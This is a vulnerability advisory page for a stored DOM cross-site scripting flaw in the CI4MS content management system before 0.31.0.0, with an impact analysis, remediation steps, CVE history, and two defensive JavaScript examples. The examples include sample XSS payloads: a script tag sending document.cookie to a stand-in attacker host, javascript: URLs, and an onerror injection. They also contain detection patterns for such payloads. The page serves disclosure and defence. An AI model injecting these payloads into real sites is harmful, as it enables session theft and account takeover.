Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-03-30
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS enabling full account takeover
Action: Patching
AI Analysis

Impact

CI4MS, a CodeIgniter 4‑based CMS skeleton, stores JavaScript payloads submitted through the Methods Management panel without sanitization or output encoding. The stored values are later rendered unencoded into administrative pages and the global navigation, producing a stored, DOM‑based cross‑site scripting vulnerability. Because the navigation is shared, the script runs in the browser of any authenticated user who loads a page that renders the poisoned value, administrators included, which is what turns a low‑privileged account's form submission into full account takeover and privilege escalation.

Affected Systems

All CI4MS releases earlier than 0.31.0.0 are susceptible. The weakness resides in the Methods Management component of the CMS, where users can create or modify application methods and pages via web forms.

Risk and Exploitability

The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L) scores 9.1, Critical: the attack is network‑reachable with low complexity, requires only a low‑privileged authenticated account that can reach the Methods Management forms, and is scoped as changed because the payload executes in other users' browsers rather than in the attacker's own session. Exploitation is straightforward: an account with access to the management forms saves a script payload in one of the affected fields, and it executes whenever any user, including an administrator, loads a view or the global navigation that renders it. EPSS currently rates the exploitation probability below 1%, the CVE is not in CISA's Known Exploited Vulnerabilities catalog, and the SSVC entry recorded on 31 March 2026 notes proof‑of‑concept exploitation and rates it not automatable. Even so, the low attack complexity and the exposure of every role through shared navigation make unpatched instances a plausible target, especially where untrusted or low‑privilege users can create methods or pages.

Generated by OpenCVE AI on March 31, 2026 at 06:25 UTC.
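
The rendering pattern described in the Impact and Risk sections above, as an added example that is not CI4MS code: a navigation item is built from two stored fields (name and url; the field names are assumed for illustration) first by direct interpolation, as the advisory describes, then with context‑aware encoding plus a scheme allow‑list on the link target. The sample record is constructed.

```javascript
// Added example, not CI4MS code. Field names (name, url) are assumed.

// HTML-encode the characters that terminate text content or a quoted
// attribute value. This is the HTML/attribute context only.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encoding cannot make a javascript: or data: URL safe inside href, so the
// link target is validated against an allow-list of URL shapes instead.
function safeHref(url) {
  const s = String(url).trim();
  if (/^\/(?!\/)/.test(s)) return s;      // site-relative path, not protocol-relative
  if (/^https?:\/\//i.test(s)) return s;  // absolute http(s) URL
  return '#';                             // javascript:, data:, //host, etc. are dropped
}

// Vulnerable pattern from the advisory: stored fields interpolated verbatim.
function renderNavItemUnsafe(item) {
  return `<li><a href="${item.url}">${item.name}</a></li>`;
}

// Hardened: validate the URL, then encode every value at its output context.
function renderNavItemSafe(item) {
  const href = escapeHtml(safeHref(item.url));
  return `<li><a href="${href}">${escapeHtml(item.name)}</a></li>`;
}

// Constructed sample record: what a low-privileged user could save through
// the management form according to the advisory.
const poisonedItem = {
  name: 'Reports<script>fetch("//attacker.invalid/?c=" + document.cookie)</script>',
  url: 'javascript:alert(document.domain)',
};

console.log('unsafe:', renderNavItemUnsafe(poisonedItem));
console.log('safe:  ', renderNavItemSafe(poisonedItem));
```

The URL check is the part most often missed: HTML‑encoding a javascript: URL leaves it fully executable once the browser follows the link, so an href sink needs validation of the value's shape, not just encoding. In a CodeIgniter 4 view the equivalent of escapeHtml is the framework's esc() helper, whose second argument selects the context (html, attr, url, js); a value must be encoded for the context it is actually written into.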

Remediation

Fixed in CI4MS 0.31.0.0, per the description and GHSA-v77r-xg3p-75g7. No separate vendor workaround is published for earlier versions.

OpenCVE Recommended Actions

  • Apply the official patch by upgrading CI4MS to version 0.31.0.0 or later
  • If an immediate upgrade is impossible, temporarily disable or restrict access to the Methods Management functionality until the patch is deployed, since any account that can reach its forms can plant the payload
  • As an interim measure, apply output encoding at every point where method/page fields are rendered (in CodeIgniter 4 views, the esc() helper with the context that matches the sink: html, attr, url or js) and validate link targets against an allow‑list of URL shapes; server‑side input filtering is a weaker secondary control and does nothing for values already stored
  • Consider a WAF rule that blocks script injection against the management endpoints as a stopgap; it cannot neutralise payloads that are already in the database
  • After upgrading, review existing method/page records for injected markup or script URLs: the upgrade changes how stored values are rendered and is not described as rewriting existing data

Generated by OpenCVE AI on March 31, 2026 at 06:25 UTC.
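
A post‑upgrade check that the recommended actions above call for, as an added example that is not CI4MS code: scanning stored method/page records for markup, inline event handlers, or script URLs that would execute if rendered unencoded. The column names (name, url, description) and the sample rows are constructed for illustration; in a real deployment the rows would be read from the CMS database.

```javascript
// Added example, not CI4MS code. Column names and rows are constructed.

// Indicators of markup or script URLs in a stored value. Each is a hint for
// human review, not proof of attack: a legitimate description may contain a tag.
const INDICATORS = [
  { label: 'html-tag',      re: /<\s*\/?\s*[a-z][^>]*>/i },
  { label: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { label: 'script-uri',    re: /^\s*(javascript|data|vbscript)\s*:/i },
];

// Return the labels of every indicator that matches the value (empty if none).
function findIndicators(value) {
  const text = String(value ?? '');
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ label }) => label);
}

// One finding per (row, column) that matched, in row order, so the result can
// be turned straight into a review list.
function auditRows(rows, columns) {
  const findings = [];
  for (const row of rows) {
    for (const column of columns) {
      const indicators = findIndicators(row[column]);
      if (indicators.length > 0) findings.push({ id: row.id, column, indicators });
    }
  }
  return findings;
}

// Constructed sample rows standing in for the methods/pages table.
// Row 4 is benign formatting that the check will still flag for review.
const sampleRows = [
  { id: 1, name: 'Dashboard', url: '/admin/dashboard', description: 'Landing page' },
  { id: 2, name: 'Reports<img src=x onerror=alert(1)>', url: '/admin/reports', description: '' },
  { id: 3, name: 'Help', url: 'javascript:fetch("//attacker.invalid")', description: 'Help page' },
  { id: 4, name: 'Notes', url: '/admin/notes', description: 'Uses <b>bold</b> labels' },
];
const AUDITED_COLUMNS = ['name', 'url', 'description'];

function runAudit() {
  return auditRows(sampleRows, AUDITED_COLUMNS);
}

for (const f of runAudit()) {
  console.log(`row ${f.id} column ${f.column}: ${f.indicators.join(', ')}`);
}
```

Treat each finding as a review item rather than an automatic delete: row 4 shows that plain formatting in a description trips the tag indicator, while row 3 shows the case that encoding alone would have missed, a script URL stored in a link field.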

Advisories
Source: GitHub GHSA
ID: GHSA-v77r-xg3p-75g7
Title: CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Wed, 01 Apr 2026 02:15:00 +0000

Type: First Time appeared
  Values removed: (none)
  Values added: Ci4-cms-erp; Ci4-cms-erp ci4ms
Type: Vendors & Products
  Values removed: (none)
  Values added: Ci4-cms-erp; Ci4-cms-erp ci4ms

Tue, 31 Mar 2026 16:15:00 +0000

Type: Metrics (ssvc)
  Values removed: (none)
  Values added: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 31 Mar 2026 03:00:00 +0000

Type: Description
  Values added: CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Type: Title
  Values added: CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Type: Weaknesses
  Values added: CWE-79
Type: References
  Values added: (not shown)
Type: Metrics (cvssV3_1)
  Values added: {'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-31T15:25:20.115Z

Reserved: 2026-03-30T16:31:39.265Z

Link: CVE-2026-34558

Vulnrichment

Updated: 2026-03-31T15:25:16.390Z

NVD

Status: Received

Published: 2026-03-30T21:17:10.493

Modified: 2026-03-30T21:17:10.493

Link: CVE-2026-34558

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-31T20:40:09Z

Weaknesses